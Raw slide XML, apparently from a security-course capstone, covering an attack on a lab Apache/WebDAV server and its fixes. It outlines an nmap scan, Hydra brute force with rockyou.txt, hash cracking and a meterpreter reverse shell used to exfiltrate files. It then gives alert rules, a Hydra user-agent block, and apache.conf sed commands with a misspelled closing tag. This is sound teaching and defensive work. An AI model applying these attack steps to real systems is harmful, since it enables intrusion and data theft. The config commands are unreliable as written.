          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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The success of this brute force attempt was the result of multiple system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerabilities, including ashton being named as the user with access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“secret_folder”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, his password being included in the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“rockyou.txt”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file and no mitigation against automated brute forcing programs such as hydra.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My advice is the implementation of a stronger password policy such as the use of a more complex “pass-phrase”. In conjunction with this I would also recommend the use of Multi-factor authentication to prevent automated attacks. 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Also, changes need to be made to the web server to omit details such as Ryan’s password hash and instructions for logon.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The final change we can make to prevent the use of Hydra specifically is to completely block traffic from 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“</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_agent.original=Mozilla/4.0 (hydra)”.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78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307" name="Google Shape;1307;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-49200" y="6098325"/>
            <a:ext cx="17193600" cy="14129100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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We can set an alarm to detect unauthorized access to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“WebDAV”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and send an email to SOC using the following criteria:</a:t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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source_ip= “NOT (“192.168.1.105” OR “192.168.1.1”)”</a:t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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url.full= “http://192.168.1.105/webdav”</a:t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Due to the limited access that is required for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the webdav we can set a threshold of &gt;0 within a minute for our alert.</a:t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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1308" name="Google Shape;1308;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17867200" y="6107700"/>
            <a:ext cx="18534600" cy="14129100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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Again, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configuration of the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“apache.conf” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file would prevent undefined ip addresses from accessing the server. We can do this easily using the following commands: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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo sed -i “/# access here, or in any related virtual host/a&lt;Directory \/var\/www\/webdav\/&gt;\n\tOrder deny,allow\n\tdeny from all\n\tAllow from 192.168.1.1\n\tAllow from 192.168.1.105\n&lt;\/Directoy&gt;” /etc/apache2/apache.conf”</a:t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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo service apache2 reload”</a:t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It is also very simple to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amendments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to this file depending on the changing scope of access required, by adding or removing IP addresses from the rule.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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>udo sed -i “/192.168.1.105/a\\\t(INSERT NEW IP HERE)” </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/etc/apache2/apache.conf”</a:t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9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14" name="Google Shape;1314;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-49200" y="6098325"/>
            <a:ext cx="17193600" cy="14129100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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We can set an alarm to detect unauthorized uploads to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“WebDAV”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and send an email to SOC using the following criteria:</a:t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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source_ip= “NOT (“192.168.1.105” OR “192.168.1.1”)”</a:t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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url.full= “http://192.168.1.105/webdav”</a:t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900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.request.method=”PUT”</a:t>
            </a:r>
            <a:endParaRPr i="1"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Once again due to the limited authorized access to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“WebDAV” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we can set a threshold of &gt;0 PUT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests from unspecified IP addresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>within a minute for our alert.</a:t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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1315" name="Google Shape;1315;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17915925" y="6107700"/>
            <a:ext cx="19503900" cy="14129100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="18477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Again, configuration of the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“apache.conf” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file would prevent undefined ip addresses from uploading to the server, by blocking PUT requests from undefined sources. We can do this easily using the following commands: </a:t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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo sed -i “/# access here, or in any related virtual host/a&lt;Directory \/var\/www\/webdav\/&gt;\n\tOrder deny,allow\n\tdeny from all\n\tAllow from 192.168.1.1\n\tAllow from 192.168.1.105\n\t&lt;Limit PUT DELETE&gt;\n\tOrder deny,allow\n\tDeny from all\n\tAllow from 192.168.1.1\n\tAllow from 192.168.1.105\n\t&lt;\/Limit&gt;\n&lt;\/Directoy&gt;” /etc/apache2/apache.conf”</a:t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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo service apache2 reload”</a:t>
            </a:r>
            <a:endParaRPr i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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or in the case of having already run the command from the previous slide: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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo sed -i “/192.168.1.105/a\\\t&lt;Limit PUT DELETE&gt;\n\tOrder deny,allow\n\tDeny from all\n\tAllow from 192.168.1.1\n\tAllow from 192.168.1.105\n\t&lt;\/Limit&gt;” /etc/apache2/apache.conf”</a:t>
            </a:r>
            <a:endParaRPr sz="4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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“sudo service apache2 reload”</a:t>
            </a:r>
            <a:endParaRPr sz="5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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097300" y="8613797"/>
            <a:ext cx="34381200" cy="3267900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t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0" name="Google Shape;1050;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34431100" y="20445691"/>
            <a:ext cx="1047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2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461500" y="3755203"/>
            <a:ext cx="26798400" cy="16075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3695525" lIns="1847775" spcFirstLastPara="1" rIns="18477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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28225200" y="3755203"/>
            <a:ext cx="7256400" cy="15610200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="739075" lIns="739075" spcFirstLastPara="1" rIns="7390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Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Range: 192.168.1.0/24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Netmask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255.255.255.0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Gateway: 192.168.1.1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IPv4: 192.168.1.1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OS: Windows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Hostname: ML-RefVm-684427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IPv4: 192.168.1.90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OS: Linux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Hostname:  Kali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IPv4: 192.168.1.100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OS:  Linux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Hostname: ELK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IPv4: 192.168.1.105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OS: Linux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3200"/>
              <a:t>Hostname: Capstone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-49700" y="0"/>
            <a:ext cx="26798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8" name="Google Shape;1058;p5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461500" y="3755200"/>
            <a:ext cx="28067006" cy="160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86" y="1195676"/>
            <a:ext cx="34350642" cy="183581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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="34431100" y="20445691"/>
            <a:ext cx="1047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950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/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="Google Shape;1065;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097300" y="7634757"/>
            <a:ext cx="34381200" cy="4246500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="369500" lIns="369500" spcFirstLastPara="1" rIns="369500" wrap="square" tIns="369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9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</p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="1847775" wrap="square" tIns="369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2" name="Google Shape;1072;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1679200" y="49441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{2C0B552A-431E-49BD-A181-305D21F2BD94}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11128800"/>
                <a:gridCol w="11128800"/>
                <a:gridCol w="11128800"/>
              </a:tblGrid>
              <a:tr h="166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5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5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5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27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4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machine host / NATSwitch</a:t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 / Vulnerability scan</a:t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</a:t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4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0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8" name="Google Shape;1078;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2788021"/>
            <a:ext cx="36576000" cy="1504500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1847775" spcFirstLastPara="1" rIns="1847775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9" name="Google Shape;1079;p60"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1758100" y="42925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{2C0B552A-431E-49BD-A181-305D21F2BD94}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11150000"/>
                <a:gridCol w="11150000"/>
                <a:gridCol w="11150000"/>
              </a:tblGrid>
              <a:tr h="163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5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5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5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16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Enabled</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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Following a network scan, we </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="3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were</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="3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able to access and conduct </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="3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reconnaissance at 192.168.1.105, which yielded important information due to a apache server misconfiguration.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en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the Directory listing allowed us to gain information on the users, useful for password cracking. And also the path to the secret </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en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directory, “company_folders/secret_folder”</a:t>
                      </a:r>
                      <a:endParaRPr i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password failure lockout</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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Due to there being no limit to the amount of failed password attempts I was able to brute force Ashton’s password using Hydra.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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For ashtoWebdav’s susceptibility to brute force attempts was the initial vulnerability which allowed us access to restricted subdomains and information</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en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practices</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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Ashton’s password was included in the “rockyou.txt” wordlist used for brute forcing passwords, allowing for easy cracking.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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Accessing Ashton’s </a:t>
                      </a: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account</a:t>
                      </a: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gave us access to the “secret_folder” which provided the </a:t>
                      </a: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steps to upload files to the Webdav, and Ryan’s password hash.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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Poor security practices</a:t>
                      </a:r>
                      <a:endParaRPr i="1"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was indicated at the logon point that Ashton could access the “secret_folder” subdirectory. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="3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Ryan’s password hash was also left in a note on the web server, allowing for it to be easily cracked with crackstation.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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4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Knowing who had access to the “secret_folder” simplified our brute force attempt. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="3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poor password management allowed us to gain access to Ryan’s account and upload files to the Webdav.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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Persistent reverse shell backdoor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 server was vulnerable to file </a:t>
                      </a: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</a:t>
                      </a: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which allowed us to write a script with msfvenom to gain a meterpreter session on the Capstone machine.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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Gaining a reverse shell allowed us to exfiltrate sensitive documents, along with </a:t>
                      </a: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execute</a:t>
                      </a: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any other </a:t>
                      </a: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arbitrary</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en" sz="3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code, to unprecedented impact.</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="3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77075" marB="377075" marR="731500" marL="731500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1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Exploitation: Directory Listing Enabled</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085" name="Google Shape;1085;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="6106550"/>
            <a:ext cx="14819400" cy="13009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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2897100" y="6106550"/>
            <a:ext cx="14318400" cy="13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739075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="739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5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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>After conducting network discovery with nmap, </a:t>
            </a:r>
            <a:endParaRPr sz="5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600">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>“nmap -sV –top-ports 1000 192.168.1.1/24”</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="4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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>we found it possible to access the Capstone machine “192.168.1.105” by navigating to this address in a web browser.</a:t>
            </a:r>
            <a:endParaRPr sz="5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1828726" y="3662159"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="69545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18280301" y="3662159"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="69545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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="19348675" y="6106550"/>
            <a:ext cx="14819400" cy="13009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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19348675" y="6228675"/>
            <a:ext cx="14318400" cy="13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739075" lIns="739075" spcFirstLastPara="1" rIns="739075" wrap="square" tIns="739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5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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The misconfiguration of the apache server allowed for reconnaissance leading to the discovery of potential usernames, to later be used in a brute force attack.</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="5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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-49200" y="0"/>
            <a:ext cx="36674400" cy="2201100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="369500" lIns="1847775" spcFirstLastPara="1" rIns="1108575" wrap="square" tIns="73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</a:rPr>
              <a:t>Directory Listing Enabled</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2897100" y="5273050"/>
            <a:ext cx="30935700" cy="1432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369500" lIns="369500" spcFirstLastPara="1" rIns="369500" wrap="square" tIns="369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780" y="5786900"/>
            <a:ext cx="16637276" cy="1249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62647" y="15368450"/>
            <a:ext cx="12450100" cy="34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9919" y="5786904"/>
            <a:ext cx="11055550" cy="847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4" name="Google Shape;1104;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17673551" y="3814559"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1105" name="Google Shape;110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6" name="Google Shape;110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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="30779251" y="3814559"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1108" name="Google Shape;110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9" name="Google Shape;110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62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="30779251" y="13392059"/>
            <a:ext cx="2133487" cy="2200334"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Google Shape;111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8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2" name="Google Shape;111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369500" lIns="369500" spcFirstLastPara="1" rIns="369500" wrap="square" tIns="369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